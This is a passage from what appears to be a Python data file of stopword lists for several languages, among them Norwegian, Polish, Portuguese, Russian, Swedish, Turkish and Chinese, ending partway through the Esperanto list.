nv",u"of",u"om",u"omdat",u"ondanks",u"onder",u"ondertussen",u"ons",u"onze",u"onzeker",u"ooit",u"ook",u"op",u"over",u"overal",u"overige",u"paar",u"per",u"recent",u"redelijk",u"samen",u"sinds",u"steeds",u"te",u"tegen",u"tegenover",u"thans",u"tien",u"tiende",u"tijdens",u"tja",u"toch",u"toe",u"tot",u"totdat",u"tussen",u"twee",u"tweede",u"u",u"uit",u"uw",u"vaak",u"van",u"vanaf",u"veel",u"veertig",u"verder",u"verscheidene",u"verschillende",u"via",u"vier",
u"vierde",u"vijf",u"vijfde",u"vijftig",u"volgend",u"volgens",u"voor",u"voordat",u"voorts",u"waar",u"waarom",u"waarschijnlijk",u"wanneer",u"waren",u"was",u"wat",u"we",u"wederom",u"weer",u"weinig",u"wel",u"welk",u"welke",u"werd",u"werden",u"werder",u"whatever",u"wie",u"wij",u"wijzelf",u"wil",u"wilden",u"willen",u"word",u"worden",u"wordt",u"zal",u"ze",u"zei",u"zeker",u"zelf",u"zelfde",u"zes",u"zeven",u"zich",u"zij",u"zijn",u"zijzelf",u"zo",u"zoals",u"zodat",u"zou",u"zouden",u"zulk",u"zullen"],u"no":[u"alle",u"at",u"av",u"bare",u"begge",u"ble",u"blei",u"bli",u"blir",u"blitt",u"både",u"båe",u"da",u"de",u"deg",u"dei",u"deim",u"deira",u"deires",u"dem",u"den",u"denne",u"der",u"dere",u"deres",u"det",u"dette",u"di",u"din",u"disse",u"ditt",u"du",u"dykk",u"dykkar",u"då",u"eg",u"ein",u"eit",u"eitt",u"eller",u"elles",u"en",u"enn",u"er",u"et",u"ett",u"etter",u"for",u"fordi",u"fra",u"før",u"ha",u"hadde",u"han",u"hans",u"har",u"hennar",u"henne",u"hennes",u"her",u"hjå",u"ho",u"hoe",u"honom",u"hoss",u"hossen",u"hun",u"hva",u"hvem",u"hver",u"hvilke",u"hvilken",u"hvis",u"hvor",u"hvordan",u"hvorfor",u"i",u"ikke",u"ikkje",u"ingen",u"ingi",u"inkje",u"inn",u"inni",u"ja",u"jeg",u"kan",u"kom",u"korleis",u"korso",u"kun",u"kunne",u"kva",u"kvar",u"kvarhelst",u"kven",u"kvi",u"kvifor",u"man",u"mange",u"me",u"med",u"medan",u"meg",u"meget",u"mellom",u"men",u"mi",u"min",u"mine",u"mitt",u"mot",u"mykje",u"ned",u"no",u"noe",u"noen",u"noka",u"noko",u"nokon",u"nokor",u"nokre",u"nå",u"når",u"og",u"også",u"om",u"opp",u"oss",u"over",u"på",u"samme",u"seg",u"selv",u"si",u"sia",u"sidan",u"siden",u"sin",u"sine",u"sitt",u"sjøl",u"skal",u"skulle",u"slik",u"so",u"som",u"somme",u"somt",u"så",u"sånn",u"til",u"um",u"upp",u"ut",u"uten",u"var",u"vart",u"varte",u"ved",u"vere",u"verte",u"vi",u"vil",u"ville",u"vore",u"vors",u"vort",u"vår",u"være",u"vært",u"å"],u"pl":[u"aby",u"ach",u"aj",u"albo",u"ale",u"ani",u"aż",u"bardzo",u"bez",u"bo",u"bowiem",u"by",u"byli",u"bym",u"być",u"był",u"była",u"było",u"były",u"będzie",u"będą",u"chce",u"choć",u"ci",u"ciebie",u"cię",u"co",u"coraz",u"coś",u"czy",u"czyli",u"często",u"daleko",u"dla",u"dlaczego",u"dlatego",u"do",u"dobrze",u"dokąd",u"dość",u"dr",u"dużo",u"dwa",u"dwaj",u"dwie",u"dwoje",u"dzisiaj",u"dziś",u"gdy",u"gdyby",u"gdyż",u"gdzie",u"go",u"godz",u"hab",u"i",u"ich",u"ii",u"iii",u"ile",u"im",u"inne",u"inny",u"inż",u"iv",u"ix",u"iż",u"ja",u"jak",u"jakby",u"jaki",u"jakie",u"jako",u"je",u"jeden",u"jedna",u"jednak",u"jedno",u"jednym",u"jedynie",u"jego",u"jej",u"jemu",u"jest",u"jestem",u"jeszcze",u"jeśli",u"jeżeli",u"już",u"ją",u"każdy",u"kiedy",u"kierunku",u"kilku",u"kto",u"która",u"które",u"którego",u"której",u"który",u"których",u"którym",u"którzy",u"ku",u"lat",u"lecz",u"lub",u"ma",u"mają",u"mam",u"mamy",u"mgr",u"mi",u"miał",u"mimo",u"mnie",u"mną",u"mogą",u"moi",u"moja",u"moje",u"może",u"można",u"mu",u"musi",u"my",u"mój",u"na",u"nad",u"nam",u"nami",u"nas",u"nasi",u"nasz",u"nasza",u"nasze",u"natychmiast",u"nawet",u"nic",u"nich",u"nie",u"niego",u"niej",u"niemu",u"nigdy",u"nim",u"nimi",u"nią",u"niż",u"no",u"nowe",u"np",u"nr",u"o",u"o.o.",u"obok",u"od",u"ok",u"około",u"on",u"ona",u"one",u"oni",u"ono",u"oraz",u"owszem",u"pan",u"pl",u"po",u"pod",u"ponad",u"ponieważ",u"poza",u"prof",u"przed",u"przede",u"przedtem",u"przez",u"przy",u"raz",u"razie",u"roku",u"również",u"sam",u"sama",u"się",u"skąd",u"sobie",u"sposób",u"swoje",u"są",u"ta",u"tak",u"taki",u"takich",u"takie",u"także",u"tam",u"te",u"tego",u"tej",u"tel",u"temu",u"ten",u"teraz",u"też",u"to",u"tobie",u"tobą",u"trzeba",u"tu",u"tutaj",u"twoi",u"twoja",u"twoje",u"t
wój",u"ty",u"tych",u"tylko",u"tym",u"tys",u"tzw",u"tę",u"u",u"ul",u"vi",u"vii",u"viii",u"vol",u"w",u"wam",u"wami",u"was",u"wasi",u"wasz",u"wasza",u"wasze",u"we",u"wie",u"więc",u"wszystko",u"wtedy",u"www",u"wy",u"właśnie",u"wśród",u"xi",u"xii",u"xiii",u"xiv",u"xv",u"z",u"za",u"zawsze",u"zaś",u"ze",u"zł",u"żaden",u"że",u"żeby"],u"pt":[u"a",u"acerca",u"adeus",u"agora",u"ainda",u"algmas",u"algo",u"algumas",u"alguns",u"ali",u"além",u"ambos",u"ano",u"anos",u"antes",u"ao",u"aos",u"apenas",u"apoio",u"apontar",u"após",u"aquela",u"aquelas",u"aquele",u"aqueles",u"aqui",u"aquilo",u"as",u"assim",u"através",u"atrás",u"até",u"aí",u"baixo",u"bastante",u"bem",u"bom",u"breve",u"cada",u"caminho",u"catorze",u"cedo",u"cento",u"certamente",u"certeza",u"cima",u"cinco",u"coisa",u"com",u"como",u"comprido",u"conhecido",u"conselho",u"contra",u"corrente",u"custa",u"cá",u"da",u"daquela",u"daquele",u"dar",u"das",u"de",u"debaixo",u"demais",u"dentro",u"depois",u"desde",u"desligado",u"dessa",u"desse",u"desta",u"deste",u"deve",u"devem",u"deverá",u"dez",u"dezanove",u"dezasseis",u"dezassete",u"dezoito",u"dia",u"diante",u"direita",u"diz",u"dizem",u"dizer",u"do",u"dois",u"dos",u"doze",u"duas",u"dá",u"dão",u"dúvida",u"e",u"ela",u"elas",u"ele",u"eles",u"em",u"embora",u"enquanto",u"entre",u"então",u"era",u"essa",u"essas",u"esse",u"esses",u"esta",u"estado",u"estar",u"estará",u"estas",u"estava",u"este",u"estes",u"esteve",u"estive",u"estivemos",u"estiveram",u"estiveste",u"estivestes",u"estou",u"está",u"estás",u"estão",u"eu",u"exemplo",u"falta",u"fará",u"favor",u"faz",u"fazeis",u"fazem",u"fazemos",u"fazer",u"fazes",u"fazia",u"faço",u"fez",u"fim",u"final",u"foi",u"fomos",u"for",u"fora",u"foram",u"forma",u"foste",u"fostes",u"fui",u"geral",u"grande",u"grandes",u"grupo",u"hoje",u"horas",u"há",u"iniciar",u"inicio",u"ir",u"irá",u"isso",u"ista",u"iste",u"isto",u"já",u"lado",u"ligado",u"local",u"logo",u"longe",u"lugar",u"lá",u"maior",u"maioria",u"maiorias",u"mais",u"mal",u"mas",u"me",u"meio",u"menor",u"menos",u"meses",u"mesmo",u"meu",u"meus",u"mil",u"minha",u"minhas",u"momento",u"muito",u"muitos",u"máximo",u"mês",u"na",u"nada",u"naquela",u"naquele",u"nas",u"nem",u"nenhuma",u"nessa",u"nesse",u"nesta",u"neste",u"no",u"noite",u"nome",u"nos",u"nossa",u"nossas",u"nosso",u"nossos",u"nova",u"nove",u"novo",u"novos",u"num",u"numa",u"nunca",u"não",u"nível",u"nós",u"número",u"o",u"obra",u"obrigada",u"obrigado",u"oitava",u"oitavo",u"oito",u"onde",u"ontem",u"onze",u"os",u"ou",u"outra",u"outras",u"outro",u"outros",u"para",u"parece",u"parte",u"partir",u"pegar",u"pela",u"pelas",u"pelo",u"pelos",u"perto",u"pessoas",u"pode",u"podem",u"poder",u"poderá",u"podia",u"ponto",u"pontos",u"por",u"porque",u"porquê",u"posição",u"possivelmente",u"posso",u"possível",u"pouca",u"pouco",u"povo",u"primeira",u"primeiro",u"promeiro",u"próprio",u"próximo",u"puderam",u"pôde",u"põe",u"põem",u"qual",u"qualquer",u"quando",u"quanto",u"quarta",u"quarto",u"quatro",u"que",u"quem",u"quer",u"quero",u"questão",u"quieto",u"quinta",u"quinto",u"quinze",u"quê",u"relação",u"sabe",u"saber",u"se",u"segunda",u"segundo",u"sei",u"seis",u"sem",u"sempre",u"ser",u"seria",u"sete",u"seu",u"seus",u"sexta",u"sexto",u"sim",u"sistema",u"sob",u"sobre",u"sois",u"somente",u"somos",u"sou",u"sua",u"suas",u"são",u"sétima",u"sétimo",u"tal",u"talvez",u"também",u"tanto",u"tarde",u"te",u"tem",u"temos",u"tempo",u"tendes",u"tenho",u"tens",u"tentar",u"tentaram",u"tente",u"tentei",u"ter",u"terceira",u"terceiro",u"teu",u"teus",u"teve",u"tipo",u"tive",u"tivemos",u"tiveram",u"tiveste",u"tivestes",u"toda",u"todas",u"todo",u"to
dos",u"trabalhar",u"trabalho",u"treze",u"três",u"tu",u"tua",u"tuas",u"tudo",u"tão",u"têm",u"um",u"uma",u"umas",u"uns",u"usa",u"usar",u"vai",u"vais",u"valor",u"veja",u"vem",u"vens",u"ver",u"verdade",u"verdadeiro",u"vez",u"vezes",u"viagem",u"vindo",u"vinte",u"você",u"vocês",u"vos",u"vossa",u"vossas",u"vosso",u"vossos",u"vários",u"vão",u"vêm",u"vós",u"zero",u"à",u"às",u"área",u"é",u"és",u"último"],u"ru":[u"а",u"алло",u"без",u"белый",u"близко",u"более",u"больше",u"большой",u"будем",u"будет",u"будете",u"будешь",u"будто",u"буду",u"будут",u"будь",u"бы",u"бывает",u"бывь",u"был",u"была",u"были",u"было",u"быть",u"в",u"важная",u"важное",u"важные",u"важный",u"вам",u"вами",u"вас",u"ваш",u"ваша",u"ваше",u"ваши",u"вверх",u"вдали",u"вдруг",u"ведь",u"везде",u"вернуться",u"весь",u"вечер",u"взгляд",u"взять",u"вид",u"видеть",u"вместе",u"вниз",u"внизу",u"во",u"вода",u"война",u"вокруг",u"вон",u"вообще",u"вопрос",u"восемнадцатый",u"восемнадцать",u"восемь",u"восьмой",u"вот",u"впрочем",u"времени",u"время",u"все",u"всегда",u"всего",u"всем",u"всеми",u"всему",u"всех",u"всею",u"всю",u"всюду",u"вся",u"всё",u"второй",u"вы",u"выйти",u"г",u"где",u"главный",u"глаз",u"говорил",u"говорит",u"говорить",u"год",u"года",u"году",u"голова",u"голос",u"город",u"да",u"давать",u"давно",u"даже",u"далекий",u"далеко",u"дальше",u"даром",u"дать",u"два",u"двадцатый",u"двадцать",u"две",u"двенадцатый",u"двенадцать",u"дверь",u"двух",u"девятнадцатый",u"девятнадцать",u"девятый",u"девять",u"действительно",u"дел",u"делать",u"дело",u"день",u"деньги",u"десятый",u"десять",u"для",u"до",u"довольно",u"долго",u"должно",u"должный",u"дом",u"дорога",u"друг",u"другая",u"другие",u"других",u"друго",u"другое",u"другой",u"думать",u"душа",u"е",u"его",u"ее",u"ей",u"ему",u"если",u"есть",u"еще",u"ещё",u"ею",u"её",u"ж",u"ждать",u"же",u"жена",u"женщина",u"жизнь",u"жить",u"за",u"занят",u"занята",u"занято",u"заняты",u"затем",u"зато",u"зачем",u"здесь",u"земля",u"знать",u"значит",u"значить",u"и",u"идти",u"из",u"или",u"им",u"именно",u"иметь",u"ими",u"имя",u"иногда",u"их",u"к",u"каждая",u"каждое",u"каждые",u"каждый",u"кажется",u"казаться",u"как",u"какая",u"какой",u"кем",u"книга",u"когда",u"кого",u"ком",u"комната",u"кому",u"конец",u"конечно",u"которая",u"которого",u"которой",u"которые",u"который",u"которых",u"кроме",u"кругом",u"кто",u"куда",u"лежать",u"лет",u"ли",u"лицо",u"лишь",u"лучше",u"любить",u"люди",u"м",u"маленький",u"мало",u"мать",u"машина",u"между",u"меля",u"менее",u"меньше",u"меня",u"место",u"миллионов",u"мимо",u"минута",u"мир",u"мира",u"мне",u"много",u"многочисленная",u"многочисленное",u"многочисленные",u"многочисленный",u"мной",u"мною",u"мог",u"могут",u"мож",u"может",u"можно",u"можхо",u"мои",u"мой",u"мор",u"москва",u"мочь",u"моя",u"моё",u"мы",u"на",u"наверху",u"над",u"надо",u"назад",u"наиболее",u"найти",u"наконец",u"нам",u"нами",u"народ",u"нас",u"начала",u"начать",u"наш",u"наша",u"наше",u"наши",u"не",u"него",u"недавно",u"недалеко",u"нее",u"ней",u"некоторый",u"нельзя",u"нем",u"немного",u"нему",u"непрерывно",u"нередко",u"несколько",u"нет",u"нею",u"неё",u"ни",u"нибудь",u"ниже",u"низко",u"никакой",u"никогда",u"никто",u"никуда",u"ними",u"них",u"ничего",u"ничто",u"но",u"новый",u"нога",u"ночь",u"ну",u"нужно",u"нужный",u"нх",u"о",u"об",u"оба",u"обычно",u"один",u"одиннадцатый",u"одиннадцать",u"однажды",u"однако",u"одного",u"одной",u"оказаться",u"окно",u"около",u"он",u"она",u"они",u"оно",u"опять",u"особенно",u"остаться",u"от",u"ответить",u"отец",u"отовсюду",u"отсюда",u"очень",u"первый",u"перед",u"писать",u"плечо",u"по",u"под",u"подумать",u"пожалуйста",u"позже",u"пойти",u"пок
а",u"пол",u"получить",u"помнить",u"понимать",u"понять",u"пор",u"пора",u"после",u"последний",u"посмотреть",u"посреди",u"потом",u"потому",u"почему",u"почти",u"правда",u"прекрасно",u"при",u"про",u"просто",u"против",u"процентов",u"пятнадцатый",u"пятнадцать",u"пятый",u"пять",u"работа",u"работать",u"раз",u"разве",u"рано",u"раньше",u"ребенок",u"решить",u"россия",u"рука",u"русский",u"ряд",u"рядом",u"с",u"сам",u"сама",u"сами",u"самим",u"самими",u"самих",u"само",u"самого",u"самой",u"самом",u"самому",u"саму",u"самый",u"свет",u"свое",u"своего",u"своей",u"свои",u"своих",u"свой",u"свою",u"сделать",u"сеаой",u"себе",u"себя",u"сегодня",u"седьмой",u"сейчас",u"семнадцатый",u"семнадцать",u"семь",u"сидеть",u"сила",u"сих",u"сказал",u"сказала",u"сказать",u"сколько",u"слишком",u"слово",u"случай",u"смотреть",u"сначала",u"снова",u"со",u"собой",u"собою",u"советский",u"совсем",u"спасибо",u"спросить",u"сразу",u"стал",u"старый",u"стать",u"стол",u"сторона",u"стоять",u"страна",u"суть",u"считать",u"т",u"та",u"так",u"такая",u"также",u"таки",u"такие",u"такое",u"такой",u"там",u"твой",u"твоя",u"твоё",u"те",u"тебе",u"тебя",u"тем",u"теми",u"теперь",u"тех",u"то",u"тобой",u"тобою",u"товарищ",u"тогда",u"того",u"тоже",u"только",u"том",u"тому",u"тот",u"тою",u"третий",u"три",u"тринадцатый",u"тринадцать",u"ту",u"туда",u"тут",u"ты",u"тысяч",u"у",u"увидеть",u"уж",u"уже",u"улица",u"уметь",u"утро",u"хороший",u"хорошо",u"хотеть",u"хоть",u"хотя",u"хочешь",u"час",u"часто",u"часть",u"чаще",u"чего",u"человек",u"чем",u"чему",u"через",u"четвертый",u"четыре",u"четырнадцатый",u"четырнадцать",u"что",u"чтоб",u"чтобы",u"чуть",u"шестнадцатый",u"шестнадцать",u"шестой",u"шесть",u"эта",u"эти",u"этим",u"этими",u"этих",u"это",u"этого",u"этой",u"этом",u"этому",u"этот",u"эту",u"я"],u"sv":[u"aderton",u"adertonde",u"adjö",u"aldrig",u"alla",u"allas",u"allt",u"alltid",u"alltså",u"andra",u"andras",u"annan",u"annat",u"artonde",u"artonn",u"att",u"av",u"bakom",u"bara",u"behöva",u"behövas",u"behövde",u"behövt",u"beslut",u"beslutat",u"beslutit",u"bland",u"blev",u"bli",u"blir",u"blivit",u"bort",u"borta",u"bra",u"bäst",u"bättre",u"båda",u"bådas",u"dag",u"dagar",u"dagarna",u"dagen",u"de",u"del",u"delen",u"dem",u"den",u"denna",u"deras",u"dess",u"dessa",u"det",u"detta",u"dig",u"din",u"dina",u"dit",u"ditt",u"dock",u"du",u"där",u"därför",u"då",u"efter",u"eftersom",u"ej",u"elfte",u"eller",u"elva",u"en",u"enkel",u"enkelt",u"enkla",u"enligt",u"er",u"era",u"ert",u"ett",u"ettusen",u"fanns",u"fem",u"femte",u"femtio",u"femtionde",u"femton",u"femtonde",u"fick",u"fin",u"finnas",u"finns",u"fjorton",u"fjortonde",u"fjärde",u"fler",u"flera",u"flesta",u"fram",u"framför",u"från",u"fyra",u"fyrtio",u"fyrtionde",u"få",u"får",u"fått",u"följande",u"för",u"före",u"förlåt",u"förra",u"första",u"genast",u"genom",u"gick",u"gjorde",u"gjort",u"god",u"goda",u"godare",u"godast",u"gott",u"gälla",u"gäller",u"gällt",u"gärna",u"gå",u"går",u"gått",u"gör",u"göra",u"ha",u"hade",u"haft",u"han",u"hans",u"har",u"heller",u"hellre",u"helst",u"helt",u"henne",u"hennes",u"hit",u"hon",u"honom",u"hundra",u"hundraen",u"hundraett",u"hur",u"här",u"hög",u"höger",u"högre",u"högst",u"i",u"ibland",u"icke",u"idag",u"igen",u"igår",u"imorgon",u"in",u"inför",u"inga",u"ingen",u"ingenting",u"inget",u"innan",u"inne",u"inom",u"inte",u"inuti",u"ja",u"jag",u"ju",u"jämfört",u"kan",u"kanske",u"knappast",u"kom",u"komma",u"kommer",u"kommit",u"kr",u"kunde",u"kunna",u"kunnat",u"kvar",u"legat",u"ligga",u"ligger",u"lika",u"likställd",u"likställda",u"lilla",u"lite",u"liten",u"litet",u"länge",u"längre",u"längst",u"lätt",u"lättare",u"lättast",u"lån
gsam",u"långsammare",u"långsammast",u"långsamt",u"långt",u"man",u"med",u"mellan",u"men",u"mer",u"mera",u"mest",u"mig",u"min",u"mina",u"mindre",u"minst",u"mitt",u"mittemot",u"mot",u"mycket",u"många",u"måste",u"möjlig",u"möjligen",u"möjligt",u"möjligtvis",u"ned",u"nederst",u"nedersta",u"nedre",u"nej",u"ner",u"ni",u"nio",u"nionde",u"nittio",u"nittionde",u"nitton",u"nittonde",u"nog",u"noll",u"nr",u"nu",u"nummer",u"när",u"nästa",u"någon",u"någonting",u"något",u"några",u"nödvändig",u"nödvändiga",u"nödvändigt",u"nödvändigtvis",u"och",u"också",u"ofta",u"oftast",u"olika",u"olikt",u"om",u"oss",u"på",u"rakt",u"redan",u"rätt",u"sade",u"sagt",u"samma",u"sedan",u"senare",u"senast",u"sent",u"sex",u"sextio",u"sextionde",u"sexton",u"sextonde",u"sig",u"sin",u"sina",u"sist",u"sista",u"siste",u"sitt",u"sitta",u"sju",u"sjunde",u"sjuttio",u"sjuttionde",u"sjutton",u"sjuttonde",u"själv",u"sjätte",u"ska",u"skall",u"skulle",u"slutligen",u"små",u"smått",u"snart",u"som",u"stor",u"stora",u"stort",u"större",u"störst",u"säga",u"säger",u"sämre",u"sämst",u"så",u"sådan",u"sådana",u"sådant",u"tack",u"tidig",u"tidigare",u"tidigast",u"tidigt",u"till",u"tills",u"tillsammans",u"tio",u"tionde",u"tjugo",u"tjugoen",u"tjugoett",u"tjugonde",u"tjugotre",u"tjugotvå",u"tjungo",u"tolfte",u"tolv",u"tre",u"tredje",u"trettio",u"trettionde",u"tretton",u"trettonde",u"två",u"tvåhundra",u"under",u"upp",u"ur",u"ursäkt",u"ut",u"utan",u"utanför",u"ute",u"vad",u"var",u"vara",u"varför",u"varifrån",u"varit",u"varje",u"varken",u"vars",u"varsågod",u"vart",u"vem",u"vems",u"verkligen",u"vi",u"vid",u"vidare",u"viktig",u"viktigare",u"viktigast",u"viktigt",u"vilka",u"vilkas",u"vilken",u"vilket",u"vill",u"vänster",u"vänstra",u"värre",u"vår",u"våra",u"vårt",u"än",u"ännu",u"är",u"även",u"åt",u"åtminstone",u"åtta",u"åttio",u"åttionde",u"åttonde",u"över",u"övermorgon",u"överst",u"övre"],u"tr":[u"acaba",u"acep",u"adeta",u"altmýþ",u"altmış",u"altý",u"altı",u"ama",u"ancak",u"arada",u"artýk",u"aslında",u"aynen",u"ayrıca",u"az",u"bana",u"bari",u"bazen",u"bazý",u"bazı",u"baţka",u"belki",u"ben",u"benden",u"beni",u"benim",u"beri",u"beþ",u"beş",u"beţ",u"bile",u"bin",u"bir",u"biraz",u"biri",u"birkaç",u"birkez",u"birçok",u"birþey",u"birþeyi",u"birşey",u"birşeyi",u"birţey",u"biz",u"bizden",u"bize",u"bizi",u"bizim",u"bu",u"buna",u"bunda",u"bundan",u"bunlar",u"bunları",u"bunların",u"bunu",u"bunun",u"burada",u"böyle",u"böylece",u"bütün",u"da",u"daha",u"dahi",u"dahil",u"daima",u"dair",u"dayanarak",u"de",u"defa",u"deđil",u"değil",u"diye",u"diđer",u"diğer",u"doksan",u"dokuz",u"dolayı",u"dolayısıyla",u"dört",u"edecek",u"eden",u"ederek",u"edilecek",u"ediliyor",u"edilmesi",u"ediyor",u"elli",u"en",u"etmesi",u"etti",u"ettiği",u"ettiğini",u"eđer",u"eğer",u"fakat",u"gibi",u"göre",u"halbuki",u"halen",u"hangi",u"hani",u"hariç",u"hatta",u"hele",u"hem",u"henüz",u"hep",u"hepsi",u"her",u"herhangi",u"herkes",u"herkesin",u"hiç",u"hiçbir",u"iken",u"iki",u"ila",u"ile",u"ilgili",u"ilk",u"illa",u"ise",u"itibaren",u"itibariyle",u"iyi",u"iyice",u"için",u"işte",u"iţte",u"kadar",u"kanýmca",u"karşın",u"katrilyon",u"kendi",u"kendilerine",u"kendini",u"kendisi",u"kendisine",u"kendisini",u"kere",u"kez",u"keţke",u"ki",u"kim",u"kimden",u"kime",u"kimi",u"kimse",u"kýrk",u"kýsaca",u"kırk",u"lakin",u"madem",u"međer",u"milyar",u"milyon",u"mu",u"mü",u"mý",u"mı",u"nasýl",u"nasıl",u"ne",u"neden",u"nedenle",u"nerde",u"nere",u"nerede",u"nereye",u"nitekim",u"niye",u"niçin",u"o",u"olan",u"olarak",u"oldu",u"olduklarını",u"olduğu",u"olduğunu",u"olmadı",u"olmadığı",u"olmak",u"olması",u"olmayan",u"olmaz",u"olsa",u"olsun",u"o
lup",u"olur",u"olursa",u"oluyor",u"on",u"ona",u"ondan",u"onlar",u"onlardan",u"onlari",u"onlarýn",u"onları",u"onların",u"onu",u"onun",u"otuz",u"oysa",u"pek",u"rağmen",u"sadece",u"sanki",u"sekiz",u"seksen",u"sen",u"senden",u"seni",u"senin",u"siz",u"sizden",u"sizi",u"sizin",u"sonra",u"tarafından",u"trilyon",u"tüm",u"var",u"vardı",u"ve",u"veya",u"veyahut",u"ya",u"yahut",u"yani",u"yapacak",u"yapmak",u"yaptı",u"yaptıkları",u"yaptığı",u"yaptığını",u"yapılan",u"yapılması",u"yapıyor",u"yedi",u"yerine",u"yetmiþ",u"yetmiş",u"yetmiţ",u"yine",u"yirmi",u"yoksa",u"yüz",u"zaten",u"çok",u"çünkü",u"öyle",u"üzere",u"üç",u"þey",u"þeyden",u"þeyi",u"þeyler",u"þu",u"þuna",u"þunda",u"þundan",u"þunu",u"şey",u"şeyden",u"şeyi",u"şeyler",u"şu",u"şuna",u"şunda",u"şundan",u"şunları",u"şunu",u"şöyle",u"ţayet",u"ţimdi",u"ţu",u"ţöyle"],u"zh":[u"、",u"。",u"〈",u"〉",u"《",u"》",u"一",u"一切",u"一则",u"一方面",u"一旦",u"一来",u"一样",u"一般",u"七",u"万一",u"三",u"上下",u"不仅",u"不但",u"不光",u"不单",u"不只",u"不如",u"不怕",u"不惟",u"不成",u"不拘",u"不比",u"不然",u"不特",u"不独",u"不管",u"不论",u"不过",u"不问",u"与",u"与其",u"与否",u"与此同时",u"且",u"两者",u"个",u"临",u"为",u"为了",u"为什么",u"为何",u"为着",u"乃",u"乃至",u"么",u"之",u"之一",u"之所以",u"之类",u"乌乎",u"乎",u"乘",u"九",u"也",u"也好",u"也罢",u"了",u"二",u"于",u"于是",u"于是乎",u"云云",u"五",u"人家",u"什么",u"什么样",u"从",u"从而",u"他",u"他人",u"他们",u"以",u"以便",u"以免",u"以及",u"以至",u"以至于",u"以致",u"们",u"任",u"任何",u"任凭",u"似的",u"但",u"但是",u"何",u"何况",u"何处",u"何时",u"作为",u"你",u"你们",u"使得",u"例如",u"依",u"依照",u"俺",u"俺们",u"倘",u"倘使",u"倘或",u"倘然",u"倘若",u"借",u"假使",u"假如",u"假若",u"像",u"八",u"六",u"兮",u"关于",u"其",u"其一",u"其中",u"其二",u"其他",u"其余",u"其它",u"其次",u"具体地说",u"具体说来",u"再者",u"再说",u"冒",u"冲",u"况且",u"几",u"几时",u"凭",u"凭借",u"则",u"别",u"别的",u"别说",u"到",u"前后",u"前者",u"加之",u"即",u"即令",u"即使",u"即便",u"即或",u"即若",u"又",u"及",u"及其",u"及至",u"反之",u"反过来",u"反过来说",u"另",u"另一方面",u"另外",u"只是",u"只有",u"只要",u"只限",u"叫",u"叮咚",u"可",u"可以",u"可是",u"可见",u"各",u"各个",u"各位",u"各种",u"各自",u"同",u"同时",u"向",u"向着",u"吓",u"吗",u"否则",u"吧",u"吧哒",u"吱",u"呀",u"呃",u"呕",u"呗",u"呜",u"呜呼",u"呢",u"呵",u"呸",u"呼哧",u"咋",u"和",u"咚",u"咦",u"咱",u"咱们",u"咳",u"哇",u"哈",u"哈哈",u"哉",u"哎",u"哎呀",u"哎哟",u"哗",u"哟",u"哦",u"哩",u"哪",u"哪个",u"哪些",u"哪儿",u"哪天",u"哪年",u"哪怕",u"哪样",u"哪边",u"哪里",u"哼",u"哼唷",u"唉",u"啊",u"啐",u"啥",u"啦",u"啪达",u"喂",u"喏",u"喔唷",u"嗡嗡",u"嗬",u"嗯",u"嗳",u"嘎",u"嘎登",u"嘘",u"嘛",u"嘻",u"嘿",u"四",u"因",u"因为",u"因此",u"因而",u"固然",u"在",u"在下",u"地",u"多",u"多少",u"她",u"她们",u"如",u"如上所述",u"如何",u"如其",u"如果",u"如此",u"如若",u"宁",u"宁可",u"宁愿",u"宁肯",u"它",u"它们",u"对",u"对于",u"将",u"尔后",u"尚且",u"就",u"就是",u"就是说",u"尽",u"尽管",u"岂但",u"己",u"并",u"并且",u"开外",u"开始",u"归",u"当",u"当着",u"彼",u"彼此",u"往",u"待",u"得",u"怎",u"怎么",u"怎么办",u"怎么样",u"怎样",u"总之",u"总的来看",u"总的来说",u"总的说来",u"总而言之",u"恰恰相反",u"您",u"慢说",u"我",u"我们",u"或",u"或是",u"或者",u"所",u"所以",u"打",u"把",u"抑或",u"拿",u"按",u"按照",u"换句话说",u"换言之",u"据",u"接着",u"故",u"故此",u"旁人",u"无宁",u"无论",u"既",u"既是",u"既然",u"时候",u"是",u"是的",u"替",u"有",u"有些",u"有关",u"有的",u"望",u"朝",u"朝着",u"本",u"本着",u"来",u"来着",u"极了",u"果然",u"果真",u"某",u"某个",u"某些",u"根据",u"正如",u"此",u"此外",u"此间",u"毋宁",u"每",u"每当",u"比",u"比如",u"比方",u"沿",u"沿着",u"漫说",u"焉",u"然则",u"然后",u"然而",u"照",u"照着",u"甚么",u"甚而",u"甚至",u"用",u"由",u"由于",u"由此可见",u"的",u"的话",u"相对而言",u"省得",u"着",u"着呢",u"矣",u"离",u"第",u"等",u"等等",u"管",u"紧接着",u"纵",u"纵令",u"纵使",u"纵然",u"经",u"经过",u"结果",u"给",u"继而",u"综上所述",u"罢了",u"者",u"而",u"而且",u"而况",u"而外",u"而已",u"而是",u"而言",u"能",u"腾",u"自",u"自个儿",u"自从",u"自各儿",u"自家",u"自己",u"自身",u"至",u"至于",u"若",u"若是",u"若非",u"莫若",u"虽",u"虽则",u"虽然",u"虽说",u"被",u"要",u"要不",u"要不是",u"要不然",u"要么",u"要是",u"让",u"论",u"设使",u"设若",u"该",u"诸位",u"谁",u"谁知",u"赶",u"起",u"起见",u"趁",u"趁着",u"越是",u"跟",u"较",u"较之",u"边",u"过",u"还是",u"还有",u"这",u"这个",u"这么",u"这么些",u"这么样",u"这么点儿",u"这些",u"这会儿",u"这儿",u"这就是说",u"这时",u"这样",u"这边",u"这里",u"进而",u"连",u
"连同",u"通过",u"遵照",u"那",u"那个",u"那么",u"那么些",u"那么样",u"那些",u"那会儿",u"那儿",u"那时",u"那样",u"那边",u"那里",u"鄙人",u"鉴于",u"阿",u"除",u"除了",u"除此之外",u"除非",u"随",u"随着",u"零",u"非但",u"非徒",u"靠",u"顺",u"顺着",u"首先",u"︿",u"!",u"#",u"$",u"%",u"&",u"(",u")",u"*",u"+",u",",u"0",u"1",u"2",u"3",u"4",u"5",u"6",u"7",u"8",u"9",u":",u";",u"<",u">",u"?",u"@",u"[",u"]",u"{",u"|",u"}",u"~",u"¥"],u"eo":[u"adiaŭ",u"ajn",u"al",u"ankoraŭ",u"antaŭ",u"aŭ",u"bonan",u"bonvole",u"bonvolu",u"bv",u"ci",u"cia",u"cian",u"cin",u"d-ro",u"da",u"de",u"dek",u"deka",u"do",u"doktor'",u"doktoro",u"du",u"dua",u"dum",u"eble",u"ekz",u"ekzemple",u"en",u"estas",u"estis",u"estos",u"estu",u"estus",u"eĉ",u"f-no",u"feliĉan",u"for",u"fraŭlino",u"ha",u"havas",u"havis",u"havos",u"havu",u"havus",u"he",u"ho",u"hu",u"ili",u"ilia",u"ilian",u"ilin",u"inter",u"io",u"ion",u"iu",u"iujn",u"iun",u"ja",u"jam",u